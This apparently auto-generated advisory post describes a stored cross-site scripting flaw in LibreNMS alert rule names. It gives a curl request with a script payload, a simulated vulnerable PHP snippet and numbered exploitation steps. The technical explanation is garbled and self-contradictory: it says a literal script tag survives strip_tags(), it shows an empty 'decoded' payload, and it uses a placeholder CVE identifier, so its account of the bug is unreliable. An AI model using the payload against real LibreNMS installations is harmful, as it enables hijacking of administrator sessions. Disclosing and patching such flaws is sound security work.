LibreNMS, Cross-Site Scripting, CVE-2025-XXXX (Medium)

By /

Listen to this Post

The vulnerability in LibreNMS arises from insufficient input sanitization within the Alert Rules functionality. When an authenticated administrator creates or modifies an alert rule, the `name` parameter is passed to the `/ajax_form.php` endpoint. The server-side code in `includes/html/forms/alert-rules.inc.php` attempts to sanitize this input using the `strip_tags()` function, which removes literal HTML tags. However, this sanitization can be bypassed by using XML character references to encode the malicious script. For example, submitting `<script>alert(1)</script>` as the rule name will pass through `strip_tags()` unscathed. The payload is then stored in the database. The exploit triggers when an admin user views the “Alert Rules” page. The page’s JavaScript, specifically the `bootgrid()` function used to render the table, decodes these XML character references back into actual HTML tags. Consequently, the browser interprets the decoded `` payload and executes the embedded JavaScript in the context of the victim’s session.
Platform: LibreNMS
Version: 25.8.0
Vulnerability: Stored XSS
Severity: Medium

date: 2025

Prediction: 2025-Q1

What Undercode Say:

curl -X POST http://<target>/ajax_form.php \
-H 'Content-Type: application/x-www-form-urlencoded' \
-d 'name=<script>alert(document.domain)</script>'

// Simulated vulnerable code snippet from alert-rules.inc.php
$name = strip_tags($_POST['name']);
dbUpdate(['name' => $name], 'alert_rules', 'id=?', [$rule_id]);

How Exploit:

1. Attacker with admin privileges logs in.

  1. Creates a new alert rule with a malicious name containing XML-encoded script tags.
  2. When any other admin views the Alert Rules list, the encoded payload is decoded and executed by their browser.

Protection from this CVE:

Update to patched version.

Implement context-aware output encoding.

Use Content Security Policy (CSP).

Impact:

Session hijacking.

Admin account compromise.

Unauthorized actions.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top